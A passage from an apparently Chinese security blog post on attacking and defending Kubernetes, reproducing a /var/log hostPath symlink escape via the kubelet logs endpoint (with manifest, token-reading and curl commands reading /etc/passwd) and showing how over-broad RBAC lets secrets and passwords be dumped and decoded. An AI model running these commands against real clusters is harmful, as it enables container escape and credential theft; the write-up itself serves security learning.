class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line">apiVersion: v1</span><br><span class="line">kind: ServiceAccount</span><br><span class="line">metadata:</span><br><span class="line">  name: logger</span><br><span class="line">---</span><br><span class="line">apiVersion: rbac.authorization.k8s.io/v1</span><br><span class="line">kind: ClusterRole</span><br><span class="line">metadata:</span><br><span class="line">  name: user-log-reader</span><br><span class="line">rules:</span><br><span class="line">- apiGroups: [&quot;&quot;]</span><br><span class="line">  resources:</span><br><span class="line">  - nodes/log</span><br><span class="line">  verbs: [&quot;get&quot;, &quot;list&quot;, &quot;watch&quot;]</span><br><span class="line">---</span><br><span class="line">apiVersion: rbac.authorization.k8s.io/v1</span><br><span class="line">kind: ClusterRoleBinding</span><br><span class="line">metadata:</span><br><span class="line">  name: user-log-reader</span><br><span class="line">roleRef:</span><br><span class="line">  apiGroup: rbac.authorization.k8s.io</span><br><span class="line">  kind: ClusterRole</span><br><span class="line">  name: user-log-reader</span><br><span class="line">subjects:</span><br><span class="line">- kind: ServiceAccount</span><br><span class="line">  name: logger</span><br><span class="line">  namespace: default</span><br><span class="line">---</span><br><span class="line">apiVersion: v1</span><br><span class="line">kind: Pod</span><br><span class="line">metadata:</span><br><span class="line">  name: escaper</span><br><span class="line">spec:</span><br><span class="line">  serviceAccountName: logger</span><br><span class="line">  containers:</span><br><span class="line">  - name: escaper</span><br><span class="line">    image: danielsagi/kube-pod-escape</span><br><span class="line">    volumeMounts:</span><br><span class="line">    - name: logs</span><br><span class="line">      mountPath: /var/log/host</span><br><span class="line">  volumes:</span><br><span class="line">  - name: logs</span><br><span class="line">    hostPath:</span><br><span class="line">      path: /var/log/</span><br><span class="line">      type: Directory</span><br></pre></td></tr></table></figure></li>
</ul>
<h5 id="漏洞原理"><a href="#漏洞原理" class="headerlink" title="漏洞原理"></a><strong>漏洞原理</strong></h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kubectl exec --stdin --tty escaper -- /bin/bash</span><br></pre></td></tr></table></figure>
<p>这里我们首先给予这个pods get list watch查看日志的能力<br>由于kubelet的访问需要认证，所以我们找到token</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">token=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)</span><br><span class="line">curl -k https://172.17.0.1:10250/logs/ -H &quot;Authorization: Bearer $token&quot;</span><br></pre></td></tr></table></figure>
<p>可以看到有许多log<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032314060-9da11333-9159-4f77-a256-cfe5016e5880.png#averageHue=%231e1d1c&clientId=ud34a835a-3864-4&from=paste&id=u567eb641&originHeight=1438&originWidth=1938&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=ubfd6f96b-3030-4a7f-a69f-f34f56d4115&title="><br>这里我们只有logs的权限，没有其他的权限<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032313950-7f92207f-96c8-4dcf-9d2c-68cbd947907a.png#averageHue=%232d2b27&clientId=ud34a835a-3864-4&from=paste&id=ud9dbcc12&originHeight=135&originWidth=2199&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=uf0e7ae25-f72c-435f-a0df-f01774c43fe&title="><br>下面是kubectl logs的原理<br><img src="https://cdn.nlark.com/yuque/0/2023/jpeg/29417415/1700032314038-fbb58191-302f-4291-adb9-aaa3bc651c91.jpeg#averageHue=%23d6d8d0&clientId=ud34a835a-3864-4&from=paste&id=ua22a67f7&originHeight=531&originWidth=848&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u2fc45755-c9a1-4122-a05d-641830467de&title="><br>我们输入的实际路径为&#x2F;logs&#x2F;加上路径<br>而这里我们直接访问logs他其实看到的就是&#x2F;var&#x2F;logs整个目录<br>然后如果是符号连接的话，他最后其实会在宿主机上解析（kubelet运行在宿主机环境）<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032314376-4674db36-7803-400a-89a2-a37780e87daf.png#averageHue=%232b2a28&clientId=ud34a835a-3864-4&from=paste&id=uc8230a8b&originHeight=466&originWidth=2672&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u555fdc25-6458-4df8-ac13-7b2cc1d7213&title="><br>这个时候如果我们能够修改这些文件，并把他们变成符号链接<br>当我们通过kubelet访问的时候，由于kubelet是在宿主机本地解析，就导致我们可以指向任意目录</p>
<h5 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a><strong>漏洞复现</strong></h5><p>因为需要我们能够修改&#x2F;var&#x2F;log,所以需要挂载&#x2F;var&#x2F;log</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">kubectl exec --stdin --tty escaper -- /bin/bash</span><br><span class="line">find / -name lastlog 2&gt;/dev/null | wc -l | grep -q 3 &amp;&amp; echo &quot;/var/log is mounted.&quot; || echo &quot;/var/log is not mounted.&quot;</span><br><span class="line">cd /var/log/host</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032314470-34cf3cce-02d3-4d51-b0b9-d1c76465d86f.png#averageHue=%2322201f&clientId=ud34a835a-3864-4&from=paste&id=u93d0fb18&originHeight=413&originWidth=2629&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u311088e5-6b68-40c2-a0ac-e6e1948c6a9&title="><br>然后我们创建一个符号链接</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ln -s / ./root_link</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032314659-279334d4-dd6a-458f-a9c2-bb5aae7b7c1e.png#averageHue=%231f1d1d&clientId=ud34a835a-3864-4&from=paste&id=u8751e5ab&originHeight=1169&originWidth=1646&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u3f1b7cb6-fc41-4e00-b58d-16ee3ad3c19&title="><br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032314645-e6655000-c303-42e5-9afe-ad5a0c9a9af2.png#averageHue=%231f1d1d&clientId=ud34a835a-3864-4&from=paste&id=u44c6ea7e&originHeight=1163&originWidth=1811&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=ue45ca825-fe35-4559-b349-9870183a94c&title="><br>可以看到宿主机的&#x2F;var&#x2F;log因为被挂载导致修改，这个时候我们在利用kubelet去访问，root_link会解析到宿主机&#x2F;导致任意文件读取</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">token=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)</span><br><span class="line">curl -k https://172.17.0.1:10250/logs/root_link/ -H &quot;Authorization: Bearer $token&quot;</span><br><span class="line">curl -k https://172.17.0.1:10250/logs/root_link/etc/passwd -H &quot;Authorization: Bearer $token&quot;</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032314963-b4770267-7444-4579-b33d-8029bdc312b3.png#averageHue=%231d1c1c&clientId=ud34a835a-3864-4&from=paste&id=u3aa6d2b8&originHeight=1486&originWidth=2427&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u802e67d8-b55c-43f1-94b4-011c67d2ff2&title="><br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032315078-18320175-13da-4d5f-b62e-e27fd28a5ddc.png#averageHue=%231e1d1d&clientId=ud34a835a-3864-4&from=paste&id=u007f0f2e&originHeight=1327&originWidth=2628&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=uc51c96f1-c170-4cc2-a6c5-6f31bb2258d&title="><br>挂载log之后敏感文件窃取<br><a target="_blank" rel="noopener" href="https://github.com/danielsagi/kube-pod-escape/blob/master/find_sensitive_files.py">https://github.com/danielsagi/kube-pod-escape/blob/master/find_sensitive_files.py</a></p>
<h4 id="RBAC权限配置不当"><a href="#RBAC权限配置不当" class="headerlink" title="RBAC权限配置不当"></a>RBAC权限配置不当</h4><p>当我们拿到token之后，可以用如下命令查看当前权限</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kubectl --kubeconfig=config.yaml auth can-i --<span class="built_in">list</span></span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701174321541-839a5c93-2fa2-47c0-8cab-6767463ca523.png#averageHue=%23040404&clientId=ubcbefb06-20fd-4&from=drop&id=u8dba14b1&originHeight=738&originWidth=2034&originalType=binary&ratio=2&rotation=0&showTitle=false&size=1520757&status=done&style=none&taskId=uf8268da2-14d6-49e0-81e5-b77afc2158e&title=" alt="截屏2023-11-28 20.25.17.png"><br>如果我们当前的权限很小，比如说没有pod之类的权限，但是因为权限配置不当让我们有读取secret的权限，那么我们可以试图从secret里找一些可以用的敏感信息，包括但不限于大权限的service account、ak\sk、系统账密等</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kubectl get secret -A</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701175681467-de667ec1-2341-4398-a359-3f1b26b119cd.png#averageHue=%23050504&clientId=ubcbefb06-20fd-4&from=drop&id=ue672e054&originHeight=598&originWidth=2274&originalType=binary&ratio=2&rotation=0&showTitle=false&size=1647089&status=done&style=none&taskId=u0bf13743-97fc-4087-bbab-7fe1e065cd5&title=" alt="截屏2023-11-28 20.47.56.png"><br>获取某个secret的具体内容</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kubectl describe secret <span class="keyword">default</span>-token<span class="number">-6</span>q6nt -n <span class="keyword">default</span></span><br></pre></td></tr></table></figure>
<p>下面的token就可以直接拿来使用<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701175719407-ebda6e79-f57e-445f-884a-8776a8dd8643.png#averageHue=%23050504&clientId=ubcbefb06-20fd-4&from=drop&id=u31edd57a&originHeight=650&originWidth=2878&originalType=binary&ratio=2&rotation=0&showTitle=false&size=2047379&status=done&style=none&taskId=ubf1fd849-adb7-46a4-9958-be800899ec0&title=" alt="截屏2023-11-28 20.48.35.png"><br>通过describe获取secret内容，有些字段可能不显示，需要利用get</p>
<figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">kubectl</span> <span class="string">get</span> <span class="string">secret</span> <span class="string">default-token-6q6nt</span> <span class="string">-o</span> <span class="string">yaml</span></span><br></pre></td></tr></table></figure>
<p>但是这种方法获取的值都是base64 encode过的，需要我们手动base64 decode再来使用<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701226024936-226c8284-f478-468d-992c-d0ae948fd940.png#averageHue=%23050504&clientId=u847a9022-aef9-4&from=drop&id=u9b4fa980&originHeight=836&originWidth=3356&originalType=binary&ratio=2&rotation=0&showTitle=false&size=3144197&status=done&style=none&taskId=u22ae63d6-9ef0-45bc-896e-1d934b5428a&title=" alt="截屏2023-11-29 10.46.58.png"><br>我们可以直接通过这种方法来搜索secret的一些内容，看看有没有绑了cluster-admin大权限的account</p>
<figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">kubectl</span> <span class="string">get</span> <span class="string">secret</span> <span class="string">-A</span> <span class="string">-o</span> <span class="string">yaml</span>   <span class="string">|grep</span> <span class="string">admin</span></span><br></pre></td></tr></table></figure>
<p>当然也可以直接搜索password等关键字</p>
<figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">kubectl</span> <span class="string">get</span> <span class="string">secret</span> <span class="string">-A</span> <span class="string">-o</span> <span class="string">yaml</span>   <span class="string">|grep</span> <span class="string">password</span></span><br></pre></td></tr></table></figure>
<p>但是注意获取到值之后别忘了base64 decode一下，才是真正的密码<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701225769818-a2802cd7-fb26-4aff-8d10-54cb36de82b4.png#averageHue=%23732d1f&clientId=u847a9022-aef9-4&from=drop&id=u031fde49&originHeight=60&originWidth=504&originalType=binary&ratio=2&rotation=0&showTitle=false&size=49787&status=done&style=none&taskId=u3434d25e-5cd2-4158-8394-dfe5fa75e25&title=" alt="截屏2023-11-29 10.42.45.png"></p>
<h3 id="业务网段"><a href="#业务网段" class="headerlink" title="业务网段"></a><strong>业务网段</strong></h3><p>业务网段一遍会出现如下可能的问题<br>ssh弱密码<br>ftp弱密码<br>mysql弱密码<br>nacos未授权<br>redis未授权，弱密码…<br>攻击者可能利用这些漏洞导致影响面扩大</p>
<h1 id="Last-but-not-least"><a href="#Last-but-not-least" class="headerlink" title="Last but not least"></a><strong>Last but not least</strong></h1><p>有时候，可能一个不起眼、无关紧要的配置，导致一个重大的安全事件。安全确实让人看起来很繁琐，他制定了很多规范，让本来可以简化的操作复杂。但我们所做的一切，也是为了让整个系统更加安全，保障客户、公司的利益。</p>

    </article>
    <!-- license -->
    
        <div class="license-wrapper">
            <p>Author：<a href="https://azraelxuemo.github.io">azraelxuemo</a>
            <p>Link：<a href="https://azraelxuemo.github.io/2023/11/14/k8s/">https://azraelxuemo.github.io/2023/11/14/k8s/</a>
            <p>Publish date：<a href="https://azraelxuemo.github.io/2023/11/14/k8s/">November 14th 2023, 1:51:34 pm</a>
            <p>Update date：<a href="https://azraelxuemo.github.io/2023/11/14/k8s/">November 29th 2023, 10:15:43 pm</a>
            <p>License：本文采用<a rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by-nc/4.0/">知识共享署名-非商业性使用 4.0 国际许可协议</a>进行许可</p>
        </div>
    
    <!-- paginator -->
    <ul class="post-paginator">
        <li class="next">
            
                <div class="nextSlogan">Next Post</div>
                <a href="/2023/11/15/java%E5%88%9B%E9%80%A0%E5%AF%B9%E8%B1%A1/" title="java创造对象">
                    <div class="nextTitle">java创造对象</div>
                </a>
            
        </li>
        <li class="previous">
            
                <div class="prevSlogan">Previous Post</div>
                <a href="/2023/11/13/%E5%AE%B9%E5%99%A8%E9%80%83%E9%80%B8/" title="容器逃逸 All in One">
                    <div class="prevTitle">容器逃逸 All in One</div>
                </a>
            
        </li>
    </ul>
    <!-- comment -->
    
        <div class="post-comment">
            <!-- 来必力 City 版安装代码 -->


            

            

            

            <!-- utteranc评论 -->


            <!-- partial('_partial/comment/changyan') -->
            <!--PC版-->


            
            

            

        </div>
    
    <!-- timeliness note -->
    <!-- idea from: https://hexo.fluid-dev.com/posts/hexo-injector/#%E6%96%87%E7%AB%A0%E6%97%B6%E6%95%88%E6%80%A7%E6%8F%90%E7%A4%BA -->
    
    <!-- Mathjax -->
    
</main>

                <!-- profile -->
                
            </div>
            <footer class="footer footer-unloaded">
    <!-- social  -->
    
        <div class="social">
            
    
        
            
                <a href="mailto:12345@qq.com" class="iconfont-archer email" title=email ></a>
            
        
    
        
            
                <a href="//github.com/azraelxuemo" class="iconfont-archer github" target="_blank" title=github></a>
            
        
    
        
            
                <span class="iconfont-archer wechat" title=wechat>
                    
                    <img class="profile-qr" src="/assets/example_qr.png" />
                </span>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    


        </div>
    
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- website approve for Chinese user -->
    
    <!-- 不蒜子  -->
    
        <div class="busuanzi-container">
            
             
                <span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span> :)</span>
            
        </div>
    	
</footer>

        </div>
        <!-- toc -->
        
            <div class="toc-wrapper toc-wrapper-loding" style=







    top:50vh;

>
                <div class="toc-catalog">
                    <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
                </div>
                <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E9%9D%A2%E5%88%86%E6%9E%90"><span class="toc-number">2.</span> <span class="toc-text">攻击面分析</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BA%B5%E5%90%91%E6%94%BB%E5%87%BB"><span class="toc-number">2.1.</span> <span class="toc-text">纵向攻击</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8F%90%E6%9D%83"><span class="toc-number">2.1.1.</span> <span class="toc-text">提权</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#linpeas"><span class="toc-number">2.1.1.1.</span> <span class="toc-text">linpeas</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#crontab%E6%8F%90%E6%9D%83"><span class="toc-number">2.1.1.2.</span> <span class="toc-text">crontab提权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#RPATH%E6%8F%90%E6%9D%83"><span class="toc-number">2.1.1.3.</span> <span class="toc-text">RPATH提权</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%B9%E5%99%A8%E9%80%83%E9%80%B8"><span class="toc-number">2.1.2.</span> <span class="toc-text">容器逃逸</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#linpeas-1"><span class="toc-number">2.1.2.1.</span> <span class="toc-text">linpeas</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#CDK"><span class="toc-number">2.1.2.2.</span> <span class="toc-text">CDK</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%A4%A7%E6%9D%83%E9%99%90%E7%9A%84service-account"><span class="toc-number">2.1.2.3.</span> <span class="toc-text">大权限的service account</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%A8%AA%E5%90%91%E6%94%BB%E5%87%BB"><span class="toc-number">2.2.</span> <span class="toc-text">横向攻击</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%89%AB%E6%8F%8F%E7%BD%91%E6%AE%B5"><span class="toc-number">2.2.1.</span> <span class="toc-text">扫描网段</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#k8s"><span class="toc-number">2.2.2.</span> <span class="toc-text">k8s</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%AE%A4%E8%AF%81"><span class="toc-number">2.2.2.1.</span> <span class="toc-text">认证</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#token%E8%AE%A4%E8%AF%81"><span class="toc-number">2.2.2.1.1.</span> <span class="toc-text">token认证</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E8%AF%81%E4%B9%A6%E8%AE%A4%E8%AF%81"><span class="toc-number">2.2.2.1.2.</span> <span class="toc-text">证书认证</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#api-server%E6%9C%AA%E6%8E%88%E6%9D%83"><span class="toc-number">2.2.2.2.</span> <span class="toc-text">api server未授权</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#http"><span class="toc-number">2.2.2.2.1.</span> <span class="toc-text">http</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#https"><span class="toc-number">2.2.2.2.2.</span> <span class="toc-text">https</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Dashboard%E6%9C%AA%E6%8E%88%E6%9D%83"><span class="toc-number">2.2.2.3.</span> <span class="toc-text">Dashboard未授权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#kubelet%E6%9C%AA%E6%8E%88%E6%9D%83"><span class="toc-number">2.2.2.4.</span> <span class="toc-text">kubelet未授权</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#10250"><span class="toc-number">2.2.2.4.1.</span> <span class="toc-text">10250</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#10255"><span class="toc-number">2.2.2.4.2.</span> <span class="toc-text">10255</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#etcd%E6%9C%AA%E6%8E%88%E6%9D%83"><span class="toc-number">2.2.2.5.</span> <span class="toc-text">etcd未授权</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#v2"><span class="toc-number">2.2.2.5.1.</span> <span class="toc-text">v2</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#v3"><span class="toc-number">2.2.2.5.2.</span> <span class="toc-text">v3</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#k8s%E6%8C%82%E8%BD%BD-var-log%E9%80%83%E9%80%B8"><span class="toc-number">2.2.2.6.</span> <span class="toc-text">k8s挂载&#x2F;var&#x2F;log逃逸</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86"><span class="toc-number">2.2.2.6.1.</span> <span class="toc-text">漏洞原理</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="toc-number">2.2.2.6.2.</span> <span class="toc-text">漏洞复现</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#RBAC%E6%9D%83%E9%99%90%E9%85%8D%E7%BD%AE%E4%B8%8D%E5%BD%93"><span class="toc-number">2.2.2.7.</span> <span class="toc-text">RBAC权限配置不当</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%9A%E5%8A%A1%E7%BD%91%E6%AE%B5"><span class="toc-number">2.2.3.</span> <span class="toc-text">业务网段</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Last-but-not-least"><span class="toc-number">3.</span> <span class="toc-text">Last but not least</span></a></li></ol>
            </div>
        
        <!-- sidebar -->
        <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
        <div class="sidebar-panel-archives">
    <!-- 在 ejs 中将 archive 按照时间排序 -->
    
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
    
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
    
    
    
    
    <div class="total-and-search">
        <div class="total-archive">
        Total : 16
        </div>
        <!-- search  -->
        
    </div>
    
    <div class="post-archive">
    
        
            
            
            <div class="archive-year"> 2023 </div>
            <ul class="year-list">
            
        
        <li class="archive-post-item">
            <span class="archive-post-date">12/24</span>
            <a class="archive-post-title" href="/2023/12/24/qwb2023-chatting/">从fuzz视角看CTF堆题</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">12/23</span>
            <a class="archive-post-title" href="/2023/12/23/dnslog%E6%A3%80%E6%B5%8B%E8%BF%9C%E7%A8%8B%E4%BE%9D%E8%B5%96/">dnslog检测远程依赖</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">12/11</span>
            <a class="archive-post-title" href="/2023/12/11/fastjson%E5%BA%8F%E5%88%97%E5%8C%96/">fastjson序列化</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">12/03</span>
            <a class="archive-post-title" href="/2023/12/03/JNI/">JNI</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/29</span>
            <a class="archive-post-title" href="/2023/11/29/CVE-2022-21701%20yaml%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E/">CVE-2022-21701 yaml解析漏洞</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/26</span>
            <a class="archive-post-title" href="/2023/11/26/jndi/">jndi注入</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/24</span>
            <a class="archive-post-title" href="/2023/11/24/%E5%8A%A8%E6%80%81%E4%BB%A3%E7%90%86/">java动态代理</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/19</span>
            <a class="archive-post-title" href="/2023/11/19/CC%E9%93%BE/">CC链汇总</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/18</span>
            <a class="archive-post-title" href="/2023/11/18/%E5%BC%95%E7%94%A8%E7%BB%95%E8%BF%87/">java反序列化引用绕过</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/17</span>
            <a class="archive-post-title" href="/2023/11/17/CVE-2023-4357/">Chrome任意文件读->外带</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/16</span>
            <a class="archive-post-title" href="/2023/11/16/%E5%BA%8F%E5%88%97%E5%8C%96%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">java序列化\反序列化流程分析</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/15</span>
            <a class="archive-post-title" href="/2023/11/15/java%E5%88%9B%E9%80%A0%E5%AF%B9%E8%B1%A1/">java创造对象</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/14</span>
            <a class="archive-post-title" href="/2023/11/14/k8s/">k8s攻防</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/13</span>
            <a class="archive-post-title" href="/2023/11/13/%E5%AE%B9%E5%99%A8%E9%80%83%E9%80%B8/">容器逃逸 All in One</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/12</span>
            <a class="archive-post-title" href="/2023/11/12/BUUCTF%E5%88%B7%E9%A2%98/">BUUCTF pwn刷题记录</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/11</span>
            <a class="archive-post-title" href="/index.html">Welcome</a>
        </li>
    
    </div>
</div>

        <div class="sidebar-panel-tags">
    <div class="sidebar-tags-name">
        
            <span class="sidebar-tag-name" data-tags="云安全">
                <span class="iconfont-archer">&#xe606;</span>
                云安全
            </span>
        
            <span class="sidebar-tag-name" data-tags="pwn">
                <span class="iconfont-archer">&#xe606;</span>
                pwn
            </span>
        
            <span class="sidebar-tag-name" data-tags="java">
                <span class="iconfont-archer">&#xe606;</span>
                java
            </span>
        
            <span class="sidebar-tag-name" data-tags="web">
                <span class="iconfont-archer">&#xe606;</span>
                web
            </span>
        
    </div>
    <div class="iconfont-archer sidebar-tags-empty">&#xe678;</div>
    <div class="tag-load-fail" style="display: none; color: #ccc; font-size: 0.6rem;">
        缺失模块，请参考主题文档进行安装配置：https://github.com/fi3ework/hexo-theme-archer#%E5%AE%89%E8%A3%85%E4%B8%BB%E9%A2%98
    </div> 
    <div class="sidebar-tags-list"></div>
</div>

        <div class="sidebar-panel-categories">
    <div class="sidebar-categories-name">
    
    </div>
    <div class="iconfont-archer sidebar-categories-empty">&#xe678;</div>
    <div class="sidebar-categories-list"></div>
</div>

    </div>
</div>

        <!-- site-meta -->
        <script>
    var siteMetaRoot = "/"
    if (siteMetaRoot === "undefined") {
        siteMetaRoot = '/'
    }
    var siteMeta = {
        url: "https://azraelxuemo.github.io",
        root: siteMetaRoot,
        author: "azraelxuemo"
    }
</script>

        <!-- import experimental options here -->
        <!-- Custom Font -->


        <!-- main func -->
        <script src="/scripts/main.js?v=20211217"></script>
        <!-- dark mode -->
        <script src="/scripts/dark.js?v=20211217"></script>
        <!-- fancybox -->
        <script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" defer></script>
        <!-- algolia -->
        
        <!-- busuanzi -->
        
            <script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script>
        
        <!-- CNZZ -->
        
        <!-- async load share.js -->
        
